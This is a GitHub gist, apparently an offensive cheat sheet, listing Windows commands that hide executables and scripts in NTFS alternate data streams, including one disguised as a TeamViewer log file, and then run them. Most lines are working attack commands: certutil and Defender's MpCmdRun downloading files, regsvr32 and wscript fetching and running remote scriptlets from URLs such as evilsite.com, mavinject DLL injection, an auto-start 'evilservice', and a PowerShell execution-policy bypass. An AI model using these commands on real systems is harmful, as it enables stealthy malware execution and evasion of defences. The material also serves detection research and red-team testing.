-
-
Save zakhildev/ec8503c09f9345ce8016fadeaed99069 to your computer and use it in GitHub Desktop.
Execute from Alternate Streams
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
###Add content to ADS### | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | |
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o | |
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}" | |
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe | |
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat | |
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url https://www.7-zip.org/a/7z1900.exe -path c:\\temp\\1.txt:7-zip.exe | |
###Extract content from ADS### | |
expand c:\ads\file.txt:test.exe c:\temp\evil.exe | |
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o | |
###Executing the ADS content### | |
* WMIC | |
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' | |
* Rundll32 | |
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain | |
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll | |
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll | |
* Cscript | |
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs" | |
* Wscript | |
wscript c:\ads\file.txt:script.vbs | |
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js | |
* Forfiles | |
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe" | |
* Mavinject.exe | |
c:\windows\SysWOW64\notepad.exe | |
tasklist | findstr notepad | |
notepad.exe 4172 31C5CE94259D4006 2 18,476 K | |
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" | |
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" | |
* MSHTA | |
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta" | |
(Does not work on Windows 10 1903 and newer) | |
* Control.exe | |
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll | |
https://twitter.com/bohops/status/954466315913310209 | |
* Create service and run | |
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto | |
sc start evilservice | |
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | |
* Powershell.exe | |
powershell -ep bypass - < c:\temp:ttt | |
* Powershell.exe | |
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}" | |
* Powershell.exe | |
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe} | |
* Regedit.exe | |
regedit c:\ads\file.txt:regfile.reg | |
* Bitsadmin.exe | |
bitsadmin /create myfile | |
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe | |
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL | |
bitsadmin /RESUME myfile | |
* AppVLP.exe | |
AppVLP.exe c:\windows\tracing\test.txt:ha.exe | |
* Cmd.exe | |
cmd.exe - < fakefile.doc:reg32.bat | |
https://twitter.com/yeyint_mth/status/1143824979139579904 | |
* Ftp.exe | |
ftp -s:fakefile.txt:aaaa.txt | |
https://github.com/sailay1996/misc-bin/blob/master/ads.md | |
* ieframe.dll , shdocvw.dll (ads) | |
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt | |
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt | |
https://github.com/sailay1996/misc-bin/blob/master/ads.md | |
* bash.exe | |
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh | |
bash.exe -c $(fakefile.txt:payload.sh) | |
https://github.com/sailay1996/misc-bin/blob/master/ads.md | |
* Regsvr32 | |
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS | |
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS | |
### Write registry | |
regini.exe file.txt:hidden.ini | |
From @elisalem9 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment